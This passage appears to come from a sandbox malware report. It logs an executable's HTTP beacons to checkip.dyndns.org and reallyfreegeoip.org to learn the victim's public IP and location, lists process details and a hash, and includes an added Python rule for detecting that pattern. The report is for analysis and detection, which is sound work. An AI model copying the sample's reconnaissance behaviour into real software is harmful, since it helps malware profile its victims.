                                                                       Jan 10, 2025 16:47:01.953629971 CET | 273 | IN | HTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:47:01 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 104
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                       6 | 192.168.2.6 | 49765 | 193.122.6.168 | 80 | 6968 | C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       Jan 10, 2025 16:47:02.714654922 CET | 127 | OUT | GET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                       Jan 10, 2025 16:47:03.354710102 CET | 273 | IN | HTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:47:03 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 104
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                       0 | 192.168.2.6 | 49711 | 104.21.16.1 | 443 | 6968 | C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       2025-01-10 15:46:55 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      Connection: Keep-Alive
                                                                       2025-01-10 15:46:55 UTC | 857 | IN | HTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:46:55 GMT
                                                                      Content-Type: text/xml
                                                                      Content-Length: 362
                                                                      Connection: close
                                                                      Age: 1838804
                                                                      Cache-Control: max-age=31536000
                                                                      cf-cache-status: HIT
                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v7tiRBSHb8dzESGCjgyqQGTD85FPZ2mpYM34OrgftqCnibjmYCez4z%2FCAb%2BiJkI1RP6QVo2RcSC%2B%2B5ieMQr8pD5fyquDtNBnd4u9Oa3TVwTyZWowaqjsunzsf5pljbhTeHHAe5DP"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8ffdcd765c9e1899-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=5705&min_rtt=5164&rtt_var=2323&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=565453&cwnd=153&unsent_bytes=0&cid=66e3cfc1e17f9e68&ts=252&x=0"
                                                                       2025-01-10 15:46:55 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo
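
The two session types above are the beacon pattern this sample uses before it exfiltrates anything: an unauthenticated GET to checkip.dyndns.org (with a .NET 1.0-era MSIE 6.0 User-Agent) to learn its public address, followed within a second or two by GET /xml/<that address> on reallyfreegeoip.org from the same PID, so the operator receives the victim's country. The following Python is an added example, not part of the Joe Sandbox report and not code from the sample; it parses both response bodies as they appear in the report (including the geolocation XML that the report shows cut off at `</TimeZo`) and runs a correlation rule over a constructed proxy log whose `pid=`/`sport=`/`host=`/`path=`/`ua=` field layout, PID 4120 and the curl entries are assumptions made up for the example; the 6968 entries reuse timestamps, ports and hosts from the sessions above.

```python
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Optional

# Hosts seen in the sandbox sessions: public-IP echo first, geolocation second.
IP_CHECK_HOSTS = {"checkip.dyndns.org"}
GEOIP_HOSTS = {"reallyfreegeoip.org"}
# User-Agent the sample sends to checkip.dyndns.org. No current browser sends a
# .NET CLR 1.0 string; it is weak alone but strengthens the correlation below.
LEGACY_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")

# Response bodies copied from the report's "Data Ascii" lines (the XML one is
# truncated exactly as the report shows it).
CHECKIP_BODY = ("<html><head><title>Current IP Check</title></head>"
                "<body>Current IP Address: 8.46.123.189</body></html>\r\n")
GEOIP_BODY_TRUNCATED = ("<Response>\n\t<IP>8.46.123.189</IP>\n\t<CountryCode>US</CountryCode>"
                        "\n\t<CountryName>United States</CountryName>\n\t<RegionCode>NY</RegionCode>"
                        "\n\t<City>New York</City>\n\t<TimeZone>America/New_York</TimeZo")


def parse_checkip_body(html: str) -> Optional[str]:
    """Pull the public IPv4 out of the checkip.dyndns.org HTML body."""
    m = re.search(r"Current IP Address:\s*(\d{1,3}(?:\.\d{1,3}){3})", html)
    return m.group(1) if m else None


def parse_geoip_xml(text: str) -> dict:
    """Map <Response> child tags to text. The report's copy of the body is cut
    off mid-tag, so when the XML is not well-formed fall back to a per-tag
    regex that only keeps tags whose closing tag is present."""
    try:
        root = ET.fromstring(text)
        return {child.tag: (child.text or "").strip() for child in root}
    except ET.ParseError:
        return {tag: val for tag, val in re.findall(r"<([A-Za-z]+)>([^<]*)</\1>", text)}


@dataclass
class HttpEvent:
    ts: datetime
    pid: int
    sport: int
    host: str
    path: str
    ua: str


# Assumed proxy-log layout for the example (not a real product's format).
LOG_RE = re.compile(
    r'^(?P<ts>\S+) pid=(?P<pid>\d+) sport=(?P<sport>\d+) host=(?P<host>\S+) '
    r'path=(?P<path>\S+) ua="(?P<ua>[^"]*)"$'
)


def parse_proxy_log(text: str) -> list:
    """Parse log lines into HttpEvents, skipping malformed lines, sorted by time."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S.%fZ").replace(tzinfo=timezone.utc)
        events.append(HttpEvent(ts, int(m["pid"]), int(m["sport"]), m["host"], m["path"], m["ua"]))
    return sorted(events, key=lambda e: e.ts)


def correlate(events: list, window: timedelta = timedelta(seconds=10)) -> list:
    """Pair each IP-check request with the next unmatched geolocation request
    from the same PID whose path embeds an IPv4 address, within `window`.
    A lone IP check (curl, a legitimate updater) produces no alert."""
    alerts, consumed = [], set()
    for chk in events:
        if chk.host not in IP_CHECK_HOSTS:
            continue
        for j, geo in enumerate(events):          # events are time-ordered
            if j in consumed or geo.host not in GEOIP_HOSTS or geo.pid != chk.pid:
                continue
            if not (chk.ts <= geo.ts <= chk.ts + window):
                continue
            ip = IPV4_RE.search(geo.path)
            if not ip:
                continue
            consumed.add(j)
            alerts.append({"pid": chk.pid, "public_ip": ip.group(1),
                           "delta_s": round((geo.ts - chk.ts).total_seconds(), 3),
                           "legacy_ua": chk.ua == LEGACY_UA})
            break
    return alerts


# Constructed sample log: pid 6968 mirrors sessions 0/1 above; pid 4120 is a
# made-up benign client that checks its IP but never geolocates within the window.
SAMPLE_LOG = """\
2025-01-10T15:46:53.446Z pid=6968 sport=49710 host=checkip.dyndns.org path=/ ua="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
2025-01-10T15:46:55.120Z pid=6968 sport=49711 host=reallyfreegeoip.org path=/xml/8.46.123.189 ua=""
2025-01-10T15:46:56.097Z pid=6968 sport=49714 host=checkip.dyndns.org path=/ ua="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
2025-01-10T15:46:57.300Z pid=6968 sport=49720 host=reallyfreegeoip.org path=/xml/8.46.123.189 ua=""
2025-01-10T15:47:30.000Z pid=4120 sport=50001 host=checkip.dyndns.org path=/ ua="curl/8.4.0"
2025-01-10T15:52:10.000Z pid=4120 sport=50007 host=reallyfreegeoip.org path=/xml/8.46.123.189 ua="curl/8.4.0"
"""

if __name__ == "__main__":
    print(parse_checkip_body(CHECKIP_BODY), parse_geoip_xml(GEOIP_BODY_TRUNCATED))
    for a in correlate(parse_proxy_log(SAMPLE_LOG)):
        print(a)
```

The rule keys on the sequence rather than on either host alone: both services are used by legitimate software, but a process that echoes its own address and immediately feeds it back into a geolocation lookup, with no User-Agent on the second request and a legacy one on the first, is the behaviour the "Tries to detect the country of the analysis system" signature describes. Tune `window` to the observed gap (about 1.7 s here) plus slack, and key on PID or source port rather than host IP, since the sample opened a fresh connection for every retry.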


                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                       1 | 192.168.2.6 | 49713 | 104.21.16.1 | 443 | 6968 | C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       2025-01-10 15:46:55 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                       2025-01-10 15:46:55 UTC | 855 | IN | HTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:46:55 GMT
                                                                      Content-Type: text/xml
                                                                      Content-Length: 362
                                                                      Connection: close
                                                                      Age: 1838805
                                                                      Cache-Control: max-age=31536000
                                                                      cf-cache-status: HIT
                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mu2icpIxwJoLwBn41wajm%2BSdxM09awviwiBHqW%2BNYy5btnfJu2Nk8WpfY1JjtKAf8bh1m5XGJo13VxbWt1ED0MwmbuW1UXxJ6YaWFVLPBJ%2BjgfRpW0bpEueUyr11nBcgVbdiyDR7"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8ffdcd7ba9ca1899-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1707&min_rtt=1693&rtt_var=663&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1616832&cwnd=153&unsent_bytes=0&cid=de6d051021ea7579&ts=137&x=0"
                                                                       2025-01-10 15:46:55 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                       2 | 192.168.2.6 | 49720 | 104.21.16.1 | 443 | 6968 | C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       2025-01-10 15:46:57 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      Connection: Keep-Alive
                                                                       2025-01-10 15:46:57 UTC | 861 | IN | HTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:46:57 GMT
                                                                      Content-Type: text/xml
                                                                      Content-Length: 362
                                                                      Connection: close
                                                                      Age: 1838806
                                                                      Cache-Control: max-age=31536000
                                                                      cf-cache-status: HIT
                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8jA3BHLI2I01jvJaP616ZEZVmuKGcRvhT1mhWYSET9SJUVXfsCPsVXaHLwvdsf%2Bjqg096RZmgvwzwp55U2%2FILaqCS%2B51CjGviKC%2BjvwozIAK%2BCIhezZFcQtkkgDwEY6%2B0o0xDi1X"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8ffdcd841e5f8ce3-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1976&min_rtt=1896&rtt_var=768&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1540084&cwnd=252&unsent_bytes=0&cid=751f4c7f28c58c8d&ts=160&x=0"
                                                                       2025-01-10 15:46:57 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                       3 | 192.168.2.6 | 49729 | 104.21.16.1 | 443 | 6968 | C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       2025-01-10 15:46:58 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                       2025-01-10 15:46:58 UTC | 853 | IN | HTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:46:58 GMT
                                                                      Content-Type: text/xml
                                                                      Content-Length: 362
                                                                      Connection: close
                                                                      Age: 1838807
                                                                      Cache-Control: max-age=31536000
                                                                      cf-cache-status: HIT
                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xvz4HxBzo3NUjAMwEkSk19d3kvZPudiAk8O27OIKEplsVtWjdbwW2xNckbi0WJrnuMAglWlft7v8chv73j5GKP741VVdaRs1SP3Bxmog49NC%2B2HWXglteDqT%2B8Fy9MMDu51y6yMs"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8ffdcd8c3c1641ba-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2168&min_rtt=1766&rtt_var=949&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1653454&cwnd=192&unsent_bytes=0&cid=545739481f26e68a&ts=137&x=0"
                                                                       2025-01-10 15:46:58 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49740 | 104.21.16.1 | 443 | 6968 | C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 15:46:59 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
2025-01-10 15:46:59 UTC | 857 | IN | HTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:46:59 GMT
                                                                      Content-Type: text/xml
                                                                      Content-Length: 362
                                                                      Connection: close
                                                                      Age: 1838809
                                                                      Cache-Control: max-age=31536000
                                                                      cf-cache-status: HIT
                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8li5MSfay7Zw4fCI%2FaxxsJu%2FESMLRUrV6JNIimoTI%2Bwa2YfaNQn0GokMpvncF7WBvKgAdnPXiAXtUAOWPnKJDrw3zXkUQATV2iHbfULbqB81ios7Y%2BsmAXOZ7YtoiZvrIV6h7lu9"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8ffdcd9458f80fa8-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1586&rtt_var=797&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1218697&cwnd=252&unsent_bytes=0&cid=ab1143b333aca574&ts=171&x=0"
2025-01-10 15:46:59 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49752 | 104.21.16.1 | 443 | 6968 | C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 15:47:01 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      Connection: Keep-Alive
2025-01-10 15:47:01 UTC | 851 | IN | HTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:47:01 GMT
                                                                      Content-Type: text/xml
                                                                      Content-Length: 362
                                                                      Connection: close
                                                                      Age: 1838810
                                                                      Cache-Control: max-age=31536000
                                                                      cf-cache-status: HIT
                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JhObESFzN7xsutzo6ptfIpu67TlLcWX1VoRKPFjufladm18KJVkpy2UQLmWTAto%2F3Hew0s5Pcncmh3dcqf8frojcFBAd8LxC3PlP9wbCYYUzjBnIHW5gxKnWOonHFUD6XaTDrGAh"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8ffdcd9c9c551899-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1607&rtt_var=604&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1808049&cwnd=153&unsent_bytes=0&cid=6862a3ace4d53d7d&ts=169&x=0"
2025-01-10 15:47:01 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49759 | 104.21.16.1 | 443 | 6968 | C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 15:47:02 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
2025-01-10 15:47:02 UTC | 853 | IN | HTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:47:02 GMT
                                                                      Content-Type: text/xml
                                                                      Content-Length: 362
                                                                      Connection: close
                                                                      Age: 1838811
                                                                      Cache-Control: max-age=31536000
                                                                      cf-cache-status: HIT
                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BFN2KD4J3KyvzekX8uLEAVVqGskraPR4OzPIP9NfOWQI14aUOL3j%2BVoQqBIr97Spv72NyIk920xST%2FDUVUkjkkH9Vz9kDdKdf6H3KK6Jl9Iigl78hfhhhyPoMHnFu2Mp2hGDidVX"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8ffdcda51e6a8ce3-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1867&min_rtt=1867&rtt_var=701&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1558996&cwnd=252&unsent_bytes=0&cid=633f6f66050fd40c&ts=212&x=0"
2025-01-10 15:47:02 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49771 | 104.21.16.1 | 443 | 6968 | C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 15:47:03 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      Connection: Keep-Alive
2025-01-10 15:47:03 UTC | 852 | IN | HTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:47:03 GMT
                                                                      Content-Type: text/xml
                                                                      Content-Length: 362
                                                                      Connection: close
                                                                      Age: 1838813
                                                                      Cache-Control: max-age=31536000
                                                                      cf-cache-status: HIT
                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V%2Fjha4WJGv3Xul7oJQZhZuL40KbRaSip5j4Uq8hqsAId3zjwUTyHORyfzDscsjffLGAYplGaUt3QQ3r86LiB6kbSjqXuvXMSb319Be1HOMlwstA%2BGTIQGLklOaPLXIbTPA0GdGfl"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8ffdcdad7e3d8ce3-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1864&min_rtt=1864&rtt_var=932&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4236&recv_bytes=699&delivery_rate=134234&cwnd=252&unsent_bytes=0&cid=f5d402d9ea3a3c6b&ts=140&x=0"
2025-01-10 15:47:03 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                      Target ID:0
                                                                      Start time:10:46:47
                                                                      Start date:10/01/2025
                                                                      Path:C:\Users\user\Desktop\8kDIr4ZdNj.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\8kDIr4ZdNj.exe"
                                                                      Imagebase:0x890000
                                                                      File size:2'382'336 bytes
                                                                      MD5 hash:A031DA4BAE8BD9CF87C071C94F67D21B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:2
                                                                      Start time:10:46:49
                                                                      Start date:10/01/2025
                                                                      Path:C:\Users\user\AppData\Local\konked\lecheries.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\8kDIr4ZdNj.exe"
